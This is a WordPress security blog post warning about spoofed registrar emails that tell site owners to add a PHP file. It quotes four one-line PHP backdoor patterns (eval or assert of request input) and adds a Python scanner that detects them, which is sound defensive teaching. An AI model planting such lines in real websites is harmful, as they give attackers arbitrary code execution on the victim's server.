WordPress Security
Posted By Gregory

Do not trust those fake domain confirmation emails

If you ever receive a letter of any kind that asks you to create, download or install some PHP code on your website, you must ignore it


Recently some of my clients received strange emails from their domain registrars. Those letters asked them to confirm that they own their domains. I checked one of those letters and quickly identified it as fraudulent. All the letters follow an identical pattern: a request to create a PHP file with a specific name and the given content in the root folder of the website. Needless to say, the suggested content for that PHP file contains malicious code known as a backdoor. This kind of code allows the attacker to execute any action they want on the victim’s website.

If you ever receive a letter of any kind that asks you to create, download or install some PHP code on your website, you must ignore it. No exceptions. Even if the letter comes from the president or your mom.

Fraudulent letters appear legitimate because they carry a legitimate From email address. But this is email spoofing. You don’t expect to receive a fake email from your friends or your domain registrar. Right? No! Any email can carry any From address. The vast majority of email servers and email clients do not check or verify the sender address, so you see whatever sender the attacker wants you to see. You must not trust any email from a known sender if it asks for a suspicious action such as installing code on your website or an application on your computer.

Technical details

Fake emails usually contain some of the following PHP lines.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

FYI: base64_decode, eval and assert are well-known markers of suspicious or malicious PHP code.
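
One way to check a site for files matching the patterns above, as an added example that is not code from the original post or from WP Cerber. It flags eval/assert calls whose argument reads request input; the names find_backdoor_markers and scan_tree are hypothetical, and treating $_GET, $_POST and $_COOKIE like $_REQUEST is an assumption that goes beyond the lines shown on this page.

```python
import re
from pathlib import Path

# PHP function names are case-insensitive, so match eval/assert in any case.
SINK = re.compile(r"\b(eval|assert)\s*\(", re.IGNORECASE)
# Request superglobals; the page shows $_REQUEST, the others are assumed equivalents.
TAINT = re.compile(r"\$_(REQUEST|GET|POST|COOKIE)\b")
WRAPPER = re.compile(r"\b(base64_decode|stripslashes)\s*\(", re.IGNORECASE)


def call_argument(source, open_paren):
    """Return the text between the '(' at open_paren and its matching ')'."""
    depth = 0
    for i in range(open_paren, len(source)):
        if source[i] == "(":
            depth += 1
        elif source[i] == ")":
            depth -= 1
            if depth == 0:
                return source[open_paren + 1:i]
    return source[open_paren + 1:]  # unbalanced: take the rest of the file


def find_backdoor_markers(source):
    """List (line, sink, wrappers) for eval/assert calls fed by request input."""
    findings = []
    for m in SINK.finditer(source):
        arg = call_argument(source, m.end() - 1)
        if TAINT.search(arg):
            line = source.count("\n", 0, m.start()) + 1
            wrappers = sorted({w.lower() for w in WRAPPER.findall(arg)})
            findings.append((line, m.group(1).lower(), wrappers))
    return findings


def scan_tree(root):
    """Scan every .php file under root; return {path: findings} for hits only."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = find_backdoor_markers(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits


# Constructed sample: one line in the pattern the page lists, one benign line.
SAMPLE = "<?php\nEVAL ( base64_decode( $_REQUEST['something'] ) );\necho strlen('eval(x)');\n"

if __name__ == "__main__":
    print(find_backdoor_markers(SAMPLE))
```

A hit is a reason to inspect the file by hand, and a clean result does not prove a site is free of backdoors, since this only matches the direct patterns listed above.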

See also: Plugin Inspector reveals security issues with other plugins



I'm a software engineer and team lead at Cerber Tech. I started coding in 1993 on IBM System/370 and today software engineering at Cerber Tech is how I make my living.
